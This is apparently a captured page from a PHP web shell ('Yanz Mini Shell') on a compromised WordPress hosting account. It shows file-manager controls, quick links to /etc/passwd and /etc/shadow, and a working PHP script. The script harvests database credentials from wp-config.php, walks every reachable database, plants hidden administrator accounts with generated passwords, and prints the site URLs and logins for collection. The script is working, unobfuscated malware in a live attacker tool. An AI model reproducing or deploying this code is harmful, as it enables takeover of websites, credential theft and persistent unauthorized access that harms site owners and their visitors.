Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
bsuccess
public_html
blessedlandlordchallenge.com
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php @ini_set('display_errors', 0); @ini_set('log_errors', 0); @error_reporting(0); function gen_str($length = 10) { return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length); } function create_users($docroot, &$already_added) { if (!file_exists("$docroot/wp-includes/version.php")) return NULL; $cms_data = Array(); $cms_data['db_login'] = ""; $cms_data['db_passwd'] = ""; $cms_data['db_name'] = ""; $cms_data['db_host'] = ""; $content = @file_get_contents("$docroot/wp-config.php"); preg_match_all(rawurldecode('%2F%28define%5C%28%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%28%5C%27%2C%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%2F'), $content, $matches); if (is_array($matches)) { for ($i = 0; $i < count($matches[2]); $i++) { if (stristr($matches[2][$i], "db_name")) { $cms_data['db_name'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_user")) { $cms_data['db_login'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_password")) { $cms_data['db_passwd'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_host")) { $cms_data['db_host'] = $matches[4][$i]; } } } return add_wp_user($cms_data, $already_added); } function add_wp_user($cms_data, &$already_added) { $db_name = $cms_data['db_name']; $db_user = $cms_data['db_login']; $db_pass = $cms_data['db_passwd']; $db_host = $cms_data['db_host']; $new_users = Array(); if (!empty($db_name)) { if (strpos($db_host, ":") !== FALSE) { $host_port = explode(":", $db_host); $host = $host_port[0]; $port = intval($host_port[1]); } else { $host = $db_host; $port = 3306; } if ($conn = mysqli_connect($host, $db_user, $db_pass, $db_name, $port)) { $result = mysqli_query($conn, "SHOW DATABASES;"); $dbs = Array(); while($row = mysqli_fetch_array($result, MYSQLI_NUM)) { $dbs[] = $row; } foreach ($dbs as $current_db) { $current_db = $current_db[0]; if (TRUE) { mysqli_select_db($conn, $current_db); $result2 = mysqli_query($conn, "SHOW TABLES;"); $tables = Array(); while($row = mysqli_fetch_array($result2, MYSQLI_NUM)) { $tables[] = $row; } foreach ($tables as $current_table) { $current_table = $current_table[0]; $prefix_pos = strpos($current_table, "usermeta"); if ($prefix_pos !== FALSE) { $prefix = substr($current_table, 0, $prefix_pos); $result3 = mysqli_query($conn, "SELECT option_value FROM " . $prefix . "options WHERE option_name='siteurl';"); $siteurl = mysqli_fetch_array($result3, MYSQLI_NUM); if (count($siteurl)) { $siteurl = $siteurl[0]; $domain = explode("/", $siteurl); $domain = $domain[2]; $domain = str_replace("www.", "", $domain); $username = str_replace(".", "", substr($domain, 0, 8)) . substr(md5($domain . "ebrsdebx8vcsw4"), 0, 2); $result_already = mysqli_query($conn, "SELECT * FROM " . $prefix . "users WHERE user_login LIKE 'wp_update-%' OR user_login='$username';"); if (mysqli_num_rows($result_already)) { break; } $config_key = $host . $db_user . $db_pass . $db_name . $domain; if (isset($already_added[$config_key])) { continue; } $already_added[$config_key] = TRUE; $pass_plain = gen_str(8); $pass = md5($pass_plain); mysqli_query($conn, "INSERT INTO $prefix" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$username', '$pass', '$username', 0, '$username', '1979-01-01 00:00:00');"); mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();"); mysqli_query($conn, "INSERT INTO $prefix" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $prefix . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); mysqli_query($conn, "INSERT INTO $prefix" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $prefix . "user_level', '10');"); mysqli_commit($conn); $new_users[] = Array($siteurl, $username, $pass_plain); } } } } } mysqli_close($conn); } } return $new_users; } function list_dir($dir, $only_dirs=TRUE) { $res = Array(); $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); $h = @opendir($dir); if ($h === FALSE) { return $res; } while (($f = readdir($h)) !== FALSE) { if ($f !== '.' and $f !== '..') { $tmp = "$dir/$f"; if ($only_dirs) { if (@is_dir($tmp)) { $res[] = $tmp; } } else{ $res[] = $tmp; } } } closedir($h); return $res; } $base_docroots = Array(); $analysys_queue = Array(); $current_dir = $_SERVER["DOCUMENT_ROOT"]; $analysys_queue[] = $current_dir; while ($current_dir = @dirname($current_dir)) { if (count($analysys_queue) && $current_dir == $analysys_queue[count($analysys_queue) - 1]) { break; } $analysys_queue[] = $current_dir; } foreach ($analysys_queue as $current_dir) { if (!in_array($current_dir, $base_docroots)) { $level1 = list_dir($current_dir); foreach ($level1 as $level1_dir) { $base_docroots = array_merge($base_docroots, list_dir($level1_dir)); } $base_docroots = array_merge($base_docroots, $level1); } } $base_docroots = array_unique(array_merge($analysys_queue, $base_docroots)); $already_added = Array(); $res = Array(); foreach ($base_docroots as $docroot_cand) { $tmp = create_users($docroot_cand, $already_added); if ($tmp) { $res = array_merge($res, $tmp); } } echo "marker3456t3wtNg8nnG"; echo serialize($res); echo "marker3456t3wtNg8nnG"; exit();
Free Space : 593058484224 Byte